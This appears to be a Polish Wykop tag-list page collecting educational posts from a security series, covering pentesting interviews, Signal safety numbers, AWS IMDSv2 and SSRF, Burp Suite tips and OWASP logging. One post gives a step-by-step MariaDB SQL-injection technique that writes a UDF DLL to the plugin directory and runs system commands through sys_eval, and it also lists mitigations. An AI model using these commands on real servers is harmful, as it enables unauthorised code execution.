Dodany: 2020-01-13 05:12:55 | Ostatnio wołany: 2020-01-13 05:17:27


Co to jest red teaming? Czym różni się od testu penetracyjnego?
Na te i inne pytania odpowiada Marcin Ludwiszewski - szef zespołu "Cyber" w Deloitte. #od0dopentestera
Zajmuje się testami ofensywnymi, obroną przed atakami oraz definiowaniem długoterminowych planów strategicznych w obrębie cyberbezpieczeństwa.
W rozmowie opowiada o ciekawych sytuacjach ze swojej pracy i używanych narzędziach.
Poruszamy aspekty prawne oraz kwestie finansowe red teamingu.
Dowiesz się na czym polega wstępne rozpoznanie oraz jak najmniejszym kosztem zwiększyć bezpieczeństwo w firmie.
Na koniec informacje o najczęściej popełnianych błędach bezpieczeństwa oraz sposoby na skuteczną edukację pracowników z tego zakresu.

Cały wywiad znajdziesz na:
- Blogu w formie tekstowej
- YouTube (sygnatury czasowe w opisie pod filmem),
- Spotify,
- Google Podcasts,
- Apple Podcasts,
- Anchor.

Masz pytanie na temat bezpieczeństwa? Zadaj je na grupie od 0 do pentestera na Facebooku.
Jeżeli chcesz być wołany do podobnych wpisów na Mirko dodaj się do Mirkolisty.

#bezpieczenstwo #informatyka #it #nauka #technologia #ciekawostki #podcast #swiat #gruparatowaniapoziomu #security #biznes #programowanie #polska #firma

Przejdź do wpisu

Dodany: 2019-12-18 08:51:37 | Ostatnio wołany: 2019-12-18 08:57:47


Błędy typu SQL Injection pozwalają na wykonanie nieautoryzowanych zapytań do naszej bazy danych.
Ale co jeszcze można uzyskać za ich pomocą? #od0dopentestera
MariaDB pozwala na zainstalowanie dodatkowych funkcji, tak zwany User-Defined Functions.
Nas interesuje taka, która umożliwia wykonanie kodu na serwerze poprzez zapytanie SQL.
Najpierw sprawdzamy wersje systemu operacyjnego oraz lokalizacje katalogu z rozszerzeniami:

SHOW GLOBAL VARIABLES LIKE '%version%';
SHOW VARIABLES LIKE 'plugin_dir';

Teraz tworzymy nową tabele i kopiujemy do niej treść odpowiedniego pliku:

CREATE TABLE files(content text);
INSERT INTO files VALUES(CHAR(1, 2, 3))

Może on zawierać bajty zerowe, dlatego też korzystamy z funkcji CHAR.
Następny krok to zapis danych z tabeli do poznanego wcześniej katalogu.
Aby było to możliwe użytkownik musi mieć odpowiednie uprawnienia.

SELECT content FROM files INTO DUMPFILE 'C:\\xampp\\mysql\\lib\\plugin\\lib_mysqludf_sys.dll';

Pozostało już tylko zarejestrować nową funkcję i wykorzystać ją do wykonania kodu:

CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.dll';
SELECT sys_e val("whoami");

(Spacja w zapytaniu powyżej jest tu z powodu usługi anty DDOS na wykopie).
Jak ochronić się przed tym atakiem?
Korzystać z kont, które nie posiadają uprawnień FILE.
Alternatywną opcją jest uruchomienie serwera z dodatkowym parametrem secure_file_priv.

Subskrybuj kanał na YouTube
Masz pytanie na temat bezpieczeństwa? Zadaj je na grupie od 0 do pentestera na Facebooku.
Jeżeli chcesz być wołany dodaj się do Mirkolisty.

#programowanie #security #informatyka #it #nauka #technologia #ciekawostki #gruparatowaniapoziomu #bezpieczenstwo #webdev #programista15k #mysql #bazydanych

Przejdź do wpisu

Dodany: 2019-12-12 09:45:34 | Ostatnio wołany: 2019-12-12 09:46:44


Używasz komunikatora Signal ale nie wiesz co to kod zabezpieczenia?
Dostałeś kiedyś komunikat o zmianie numeru bezpieczeństwa i nie wiesz o co chodzi?
Aby nasza komunikacja była prywatna musi być zaszyfrowana.
W dużym skrócie potrzebujemy do tego klucza publicznego i prywatnego.
Problem w tym, że każdy z nas może w dowolnej chwili wygenerować nowy, unikalny klucz.
Jak zatem powiązać osobę po drugiej stronie z jej kluczem aby mieć pewność, że rozmawiamy z nią a nie z kimś, kto się pod nią podszywa?
Rozwiązaniem jest termin TOFU – czyli Trust On First Use - zaufanie przy pierwszym użyciu.

Dodając nowy kontakt Signal automatycznie pobiera jego klucz.
Aplikacja zakłada, że przed pierwszym użyciem zweryfikowaliśmy poprawność kodu zabezpieczenia.
W tym momencie powinniśmy się spotkać na żywo i sprawdzić, czy wyświetlane na naszym telefonie liczby są identyczne z tymi na telefonie kolegi.
Dopiero wtedy transmisję można uznać za bezpieczną.

Niestety, przeinstalowanie aplikacji lub zmiana telefonu powoduje również zmianę kluczy i wyświetlenie wiadomości o zmianie numeru bezpieczeństwa.
W tym momencie powinniśmy ponownie spotkać się z przyjacielem i porównać identyfikatory.
W innym wypadku nie możemy mieć pewności, czy aby ktoś nie próbuje się podszyć pod naszego znajomego.

W realnym życiu takie spotkania mogą się wydać zbytnią przesadą.
Dla większości zastosowań wystarczy zwykła rozmowa telefoniczna.
Najpierw zadajemy pytanie, na które odpowiedź zna jedynie osoba po drugiej stronie.
Po prawidłowej weryfikacji możemy porównać wyświetlane na ekranach numery.
Od teraz możemy traktować nasze wiadomości jako bezpieczne.
Oczywiście do momentu, gdy nasz telefon nie wyświetli informacji o zmianie kodu zabezpieczenia.

Cały materiał znajdziesz na:
- Blogu w formie tekstowej
- Youtube (sygnatury czasowe w opisie pod filmem),
- Spotify,
- Google Podcasts,
- Apple Podcasts,
- Anchor.

Masz pytanie na temat bezpieczeństwa? Zadaj je na grupie od 0 do pentestera na Facebooku.
Jeżeli chcesz być wołany do podobnych wpisów na Mirko dodaj się do Mirkolisty.

#od0dopentestera #bezpieczenstwo #informatyka #it #nauka #technologia #ciekawostki #podcast #swiat #gruparatowaniapoziomu #security #prywatnosc

Przejdź do wpisu

Dodany: 2019-11-28 08:03:15 | Ostatnio wołany: 2019-11-28 08:05:04


Jeżeli jesteś #programista15k i używasz #aws to wiesz jak wiele usług jest tam dostępnych. #od0dopentestera
Gdy serwer EC2 musi mieć dostęp do S3 - gdzieś należy przechowywać klucze API.
Zamiast wpisywać je na sztywno do kodu aplikacji - stosuje się EC2 Instance Metadata Service.
Problem pojawia się, gdy użytkownik może podać adres domeny, z której pobieramy i wyświetlamy treść.
W taki sposób może pobrać dane z Metadata Service.
Taki atak nazywamy Server Side Request Forgery.
Aby mu zapobiec konieczne jest filtrowanie danych od użytkownika.

Ale nie każdy o tym wie - stąd nowe rozwiązanie od Amazona - IMDSv2.
W typowej podatności SSRF atakujący kontroluje adres ale nie kontroluje metody, którą jest on pobierany.
Stąd piersza zmiana - żądanie musi być wysłane przy użyciu metody PUT.
Dodatkowo musi również zawierać nagłówek, w którym określamy czas życia tokenu.
Zwrócony ciąg jest naszym kodem, który dołączamy do kolejnych żądań.

Można to porównać do logowania i ciasteczek.
Najpierw serwer sprawdza, czy posiadamy odpowiednie uprawnienia.
W tym wypadku czy możemy używać metody PUT oraz dodawać dodatkowe nagłówki.
Jeżeli tak, zwraca nam token.
Teraz każde kolejne żądanie musi go zawierać - dzięki temu Amazon wie, że nie jesteśmy atakującymi.

Czy zatem to rozwiązanie to rewolucja?
Niekoniecznie. Po pierwsze nie rozwiązuje całkowicie problemu SSRF.
Atakujący, który może wykonać dowolny kod na serwerze, obejdzie to zabezpieczenie.
Po drugie, standardowo działają obie wersje.
Dla zapewnienia bezpieczeństwa konieczne jest przepisanie aplikacji na wersję drugą i wyłączenie obsługi IMDSv1.

Cały materiał znajdziesz na:
- Blogu w formie tekstowej
- Youtube (sygnatury czasowe w opisie pod filmem),
- Spotify,
- Google Podcasts,
- Apple Podcasts,
- Anchor.

Masz pytanie na temat bezpieczeństwa? Zadaj je na grupie od 0 do pentestera na Facebooku.
Jeżeli chcesz być wołany do podobnych wpisów na Mirko dodaj się do Mirkolisty.

#programowanie #bezpieczenstwo #informatyka #it #nauka #technologia #ciekawostki #podcast #swiat #gruparatowaniapoziomu #security

Przejdź do wpisu

Dodany: 2019-11-20 05:12:15 | Ostatnio wołany: 2019-11-20 05:17:09


Jak wygląda praca osoby zajmującej się bezpieczeństwem w banku? #od0dopentestera
Adam Lange pracuje jako VP Head of Cyber Threat Hunting w Standard Chartered Bank.
W wywiadzie opowiada na czym polega threat hunting i co jest najtrudniejsze w tej pracy.
Posłuchasz o metodach działania przestępców oraz dlaczego pakiet Office tak często używany jest do ataków na firmy.
Adam tłumaczy co to jest phishing i gdzie możemy zgłosić złośliwą witrynę.
Rozmawiamy także o wpływie PSD2 na banki oraz o problemie SIM-swap.
Na koniec rada dla osób rozpoczynających swoją karierę i informacja co zrobić jeżeli staliśmy się ofiarą ataku.
Wywiad znajdziesz tu:
- YouTube (sygnatury czasowe w opisie pod filmem),
- Spotify,
- Google Podcasts,
- Apple Podcasts,
- Anchor,
- transkrypcja wywiadu.

Subskrybuj kanał na YouTube
Masz pytanie na temat bezpieczeństwa? Zadaj je na grupie od 0 do pentestera na Facebooku.
Jeżeli chcesz być wołany do podobnych wpisów na Mirko dodaj się do Mirkolisty.

#bezpieczenstwo #informatyka #it #nauka #technologia #ciekawostki #podcast #swiat #gruparatowaniapoziomu #biznes #security #hacking #bank

Przejdź do wpisu

Dodany: 2019-11-14 05:13:46 | Ostatnio wołany: 2019-11-14 05:16:21


Kilka lat temu The Guardian zapytał osoby profesjonalnie zajmujące się bezpieczeństwem, jakich rad udzielają swoim dzieciom aby uchronić je, przed zagrożeniami znajdującymi się w Internecie.
Czy te odpowiedzi dalej są aktualne? #od0dopentestera
1. Jeżeli nie zrobił byś czegoś twarzą w twarz – nie rób tego w Internecie.
Tryb prywatny w przeglądarce nie zapewnia anonimowości.
Wiadomości na zaszyfrowanych komunikatorach są tajne – chyba, że ktoś przekaże je policji.
Cyberprzemoc to wyśmiewanie z wykorzystaniem Internetu.
Może prowadzić do samobójstwa. W 2018 roku próbowało je popełnić 746 nastolatków w wieku 13-18 lat.
2. Z Internetu nic nie ginie
Większość stron nie usuwa żadnych danych a jedynie przestaje je wyświetlać.
W przyszłości mogą one zostać wykorzystane przeciwko nam, chociażby podczas rekrutacji do wymarzonej pracy.
Pliki w chmurze widoczne są jedynie dla nas.
Jednak trzeba pamiętać o potencjalnym wycieku danych.
Każda firma może bowiem stać się celem ataku.
3. Nie przyjmuj darmowych prezentów od nieznajomych
Gry free-to-play są darmowe, ale zachęcają do wydawania pieniędzy w celu przyspieszenia rozgrywki.
Email od obcego – to też swego rodzaju niespodzianka.
Nie powinno się go otwierać, zwłaszcza jeżeli zawiera załącznik.
Nie zawsze walutą są pieniądze, czasami może chodzić o nasze dane.
W przypadku najmłodszych reklamy napędzają sprzedaż zabawek.
4. Bądź z dzieckiem i monitoruj co robi
Uruchamiając ulubioną bajkę na YouTube, nigdy nie wiesz co pojawi się później.
YouTube powoli stara się to zmieniać, ale zapewne minie jeszcze sporo czasu.
Blokady nie zawsze działają, zwłaszcza wśród nastolatków.
Zablokowałeś Facebooka? A czy nie zapomniałeś o narzędziach Google?
Google Docs bowiem może zostać wykorzystany jako interaktywny czat.
Umożliwia współpracę pomiędzy różnymi użytkownikami.
Bycie znajomym na FB nie wystarczy.
Materiały mogą być bowiem publikowane jedynie dla wąskiego grona odbiorców.
5. Monitoruj gry
Na naszym rynku są one oznaczone według systemu PEGI.
Wskazuje on jaki minimalny wiek powinna mieć osoba, która chce grać w daną produkcję.
Oprócz liczby, znajdują się tam również informacje czy w grze pojawiają się narkotyki, przemoc lub też wulgarny język.

Cały materiał znajdziesz na:
- Blogu w formie tekstowej
- Youtube (sygnatury czasowe w opisie pod filmem),
- Spotify,
- Google Podcasts,
- Apple Podcasts,
- Anchor.

Masz pytanie na temat bezpieczeństwa? Zadaj je na grupie od 0 do pentestera na Facebooku.
Jeżeli chcesz być wołany do podobnych wpisów na Mirko dodaj się do Mirkolisty.

#bezpieczenstwo #informatyka #it #nauka #technologia #ciekawostki #podcast #swiat #gruparatowaniapoziomu #security #dzieci

Przejdź do wpisu

Dodany: 2019-11-05 05:11:53 | Ostatnio wołany: 2019-11-05 05:13:40


Większość z nas korzysta z Google, Gmaila czy też Chrome'a.
Od bezpieczeństwa tych narzędzi zależy bezpieczeństwo naszych danych. #od0dopentestera
Krzysztof Kotowicz to osoba, która o możliwościach ataków na serwisy internetowe wie wiele - pracuje jako Senior Software Engineer w Google.
W wywiadzie opowiada co to jest XSS i jak przekonać biznes do zainteresowania się tematami związanymi z zabezpieczeniem stron.
Dowiesz się jak działa Trusted Types a także jak wygląda praca podczas tworzenia nowych standardów w przeglądarkach w ramach Security Working Group.
Krzysztof tłumaczy co było jednym z powodów usunięcia z przeglądarki XSS Auditora, który chronił przed atakami XSS.
Zastanawiamy się również jak bezpiecznie umieścić kod HTML pochodzący od użytkownika na naszej stronie.
Jeżeli dopiero zaczynasz swoją karierę zapoznaj się z poradą dla początkujących a także odpowiedzią na pytanie, czy umiejętność programowania jest przydatna.
Ponieważ Krzysztof zajmuje się również przetwarzaniem błędów zgłoszonych do Google, zapytałem go o największe minusy Bug Bounty a także koszty, z których istnienia możemy nie zdawać sobie sprawy.
A jeżeli jesteś nieco bardziej obeznanym z tematem użytkownikiem - dowiedz się więcej o koncepcie script gadget, który umożliwia obejście mechanizmu CSP.
Na koniec rozmawiamy o nowej klasie podatności XS-Leaks, która pozwala na kradzież danych użytkownika w nietypowy sposób.

Wywiad znajdziesz tu:
- YouTube (sygnatury czasowe w opisie pod filmem),
- Spotify,
- Google Podcasts,
- Apple Podcasts,
- Anchor,
- transkrypcja wywiadu.

Subskrybuj kanał na YouTube
Masz pytanie na temat bezpieczeństwa? Zadaj je na grupie od 0 do pentestera na Facebooku.
Jeżeli chcesz być wołany do podobnych wpisów na Mirko dodaj się do Mirkolisty.

#bezpieczenstwo #informatyka #it #nauka #technologia #ciekawostki #podcast #swiat #gruparatowaniapoziomu #biznes #security #hacking

Przejdź do wpisu

Dodany: 2019-10-15 07:50:39 | Ostatnio wołany: 2019-10-15 07:51:16


W pracy #od0dopentestera potrzebujemy narzędzia, które rejestruje i ponownie wykonuje żądania http.
Jednym z nich jest Repeater z pakietu Burp.
Teoretycznie to prosty mechanizm. Po lewej treść żądania a po prawej odpowiedź serwera.
Ale istnieje trochę opcji, których mogłeś nie znać.

1. Żądania przechowywane są w ponumerowanych zakładkach.
Można zmienić ich nazwę klikając na daną zakładkę dwa razy.
2. W rogu zakładki, znajduje się przycisk „X” zamykający naszą pracę.
W najnowszej wersji możliwe jest przywrócenie zamkniętego okna.
Wystarczy użyć prawego przycisku myszy i wybrać „Reopen closed tab”.
3. Wyszukiwarka automatycznie przesuwa tekst odpowiedzi do pierwszego wystąpienia naszego słowa.
Jeżeli ma tak działać również dla nowych żądań – zaznacz „Auto-scroll”, który znajdziesz po kliknięciu w przycisk „+”.
4. W darmowej wersji nie możemy zapisywać naszej pracy w formie projektów.
Można jednak zapisać żądania z narzędzia Repeater do pliku XML.
„Save entire history” schowane jest pod prawym przyciskiem myszy.
Jedna uwaga. Tak zapisanych danych nie można w łatwy sposób przywrócić.
Jest to więc opcja awaryjna w przypadku kryzysowych sytuacji.
5. Chcesz zmienić typ żądania z POST na GET?
Wybierz: „change request method”.
6. Czasami treść żądania musi być zapisana w odpowiedni sposób.
Zamiast spacji – musimy używać znaku „+”.
Możemy skorzystać z dodatkowego modułu „Decoder” aby odpowiednio przekształcić dane.
Szybsza metoda to „URL-encode as you type”, która zmienia znaki podczas ich wpisywania z klawiatury.
7. Jeżeli zastanawiasz się dlaczego nie widzisz treści przekierowań 301 a jedynie ich wynik – musisz zmienić opcję „Follow redirections” znajdującą się w górnym menu „Repeater”.
Burp standardowo podąża za przekierowaniami, a to może przeszkadzać chociażby w poszukiwaniu błędów typu open redirection.
8. W treści żądań znajduje się nagłówek „Content-Length”, informujący serwer ile danych zostanie przesłanych przez użytkownika.
Ta wartość jest automatycznie modyfikowana aby pasowała do przesłanych przez nas informacji.
Chcąc sprawdzić zachowanie serwera dla innych wartości, odznacz „Update Content-Length”.

Moje materiały możesz posłuchać w formie podcastu na Google i Apple Podcasts oraz Spotify i Anchor.
Subskrybuj kanał na YouTube
Masz pytanie na temat bezpieczeństwa? Zadaj je na grupie od 0 do pentestera na Facebooku.
Jeżeli chcesz być wołany do podobnych wpisów na Mirko dodaj się do Mirkolisty.

#bezpieczenstwo #programowanie #informatyka #it #nauka #technologia #ciekawostki #swiat #gruparatowaniapoziomu #biznes #security

Przejdź do wpisu

Dodany: 2019-10-08 07:52:40 | Ostatnio wołany: 2019-10-08 07:53:36


Burp Suite to jedno z głównych narzędzi #od0dopentestera
Działa ono jak serwer proxy – czyli wszystko co wysyłamy i odbieramy w przeglądarce jest zapisywane również tam.
Takie dane można następnie filtrować i wybierać interesujące nas żądania.
One to mogą być przesłane do modułu repeater.
Tam można je dowolnie modyfikować – czyli dodawać lub usuwać parametry, nagłówki i ciasteczka.
Większość pracy pentestera to umiejętne manipulowanie wszystkimi parametrami i obserwowanie odpowiedzi serwera.
Sporo z nich wymaga, aby użytkownik był zalogowany.
Zazwyczaj weryfikują to na podstawie ciasteczek.
Niestety, czasami czas życia sesji ustawiony jest na bardzo niską wartość.
Znamy to ze stron banków – gdzie po kilku minutach bezczynności, zostajemy automatycznie wylogowani.
Takie zachowanie może być irytujące podczas przeprowadzania testu.
Musimy wtedy ponownie się zalogować i podmienić wartość ciasteczka – tak aby nasze żądanie wykorzystywało nową sesję.
Cała ta operacja nie jest trudna – ale żmudna, zwłaszcza jeżeli powtarzamy ją kilka razy.
Można ją uprościć wykorzystując makra – czyli grupę wcześniej zapisanych żądań, które wykonują się automatycznie gdy wystąpi jakiś warunek.
W naszym przykładzie sprawdzamy, czy na stronie pojawił się formularz logowania.
Wtedy, Burp automatycznie loguje się wykorzystując wcześniej podane przez nas dane i podmienia ciasteczka za nas.
Dzięki temu możemy skupić się na pracy a nie ciągłym kontrolowaniu sesji.

Moje materiały możesz posłuchać w formie podcastu na Google i Apple Podcasts oraz Spotify i Anchor.
Subskrybuj kanał na YouTube
Masz pytanie na temat security? Zadaj je na grupie od 0 do pentestera na Facebooku.
Jeżeli chcesz być wołany do podobnych wpisów na Mirko dodaj się do Mirkolisty.

#bezpieczenstwo #programowanie #informatyka #it #nauka #technologia #ciekawostki #swiat #gruparatowaniapoziomu #biznes #security

Przejdź do wpisu

Dodany: 2019-10-04 05:58:37 | Ostatnio wołany: 2019-10-04 05:59:51


OWASP Top 10 – czyli co każdy programista o bezpieczeństwie wiedzieć powinien #od0dopentestera
Niedostateczne logowanie i monitorowanie to ostatni z punktów na liście.
Ale jak to? Przecież brak logowania to nie jest błąd sam w sobie.
Przecież jeżeli nic nie logujemy, to też nic nie może zostać wykradzione.
A co w przypadku gdy ktoś włamie się do naszej aplikacji?
Jeżeli nie posiadamy logów, to nawet jeżeli wykryjemy włamanie, dalej nie wiemy kiedy miało miejsce, co było jego powodem, a także jakie dane zostały skradzione.
Na co zwrócić uwagę?

1. Prawidłowe logowania do systemów. Jeżeli pracujemy w Polsce a nagle widzimy adres IP należący do Nigerii – coś jest nie tak.
2. Czy nasze systemy mają dobrze ustawiony czas? 1.01.1970 00:00:00 może i ładnie wygląda ale niczego nam nie mówi.
3. Długie zapytania do bazy danych. Może ktoś wykorzystuje błędy typu Blind SQL Injection, w których przy pomocy czasu odpowiedzi można zwracać wartości prawda/fałsz?
4. Naruszenia polityki CSP pozwalają na wykrycie błędów XSS podczas pierwszych prób tworzenia działającego ataku.
5. Kto i w jaki sposób może wyłączyć monitorowanie? Czy istnieje metoda na weryfikację integralności danych? Po co nam systemy jeżeli atakujący może je zatrzymać lub wyczyścić.
6. Jak długo przechowujemy informacje? Czy można je w prosty sposób zaimportować do jednego, centralnego systemu?

Subskrybuj kanał na YouTube
Masz pytanie na temat bezpieczeństwa? Zadaj je na grupie od 0 do pentestera na Facebooku.
Podobne materiały dostępne są również w formie podcastu na Google i Apple Podcasts oraz Spotify i Anchor.
Jeżeli chcesz być wołany dodaj się do Mirkolisty.

#bezpieczenstwo #programowanie #informatyka #it #nauka #technologia #ciekawostki #swiat #gruparatowaniapoziomu #biznes #security #programista15k

Przejdź do wpisu
Założona przez:

KacperSzurek

Osób na liście: 195
Wołań: 85
Lista tagu "od 0 do pentestera" gdzie publikuje informacje na temat szeroko pojętego bezpieczeństwa komputerowego.

Kategoria: Nauka i newsy

Ostatnie wydarzenia (zobacz wszystkie)


2020-07-30 12:51:51
@hidd3n13 dołączył do listy


2020-05-27 00:11:52
@KrzysiekGO dołączył(a) do listy


2020-05-15 19:48:00
@ialath dołączył do listy


2020-05-12 09:26:07
@cybermnich dołączył do listy


2020-05-12 08:29:43
@123admin dołączył do listy


2020-05-11 23:09:32
@Nartenlener dołączył do listy


2020-05-11 23:08:43
@Ramen dołączył do listy


2020-04-28 12:28:17
@eintopf dołączył do listy


2020-04-27 23:02:03
@geralt101 dołączył do listy


2020-04-27 21:15:30
@fakeman dołączył do listy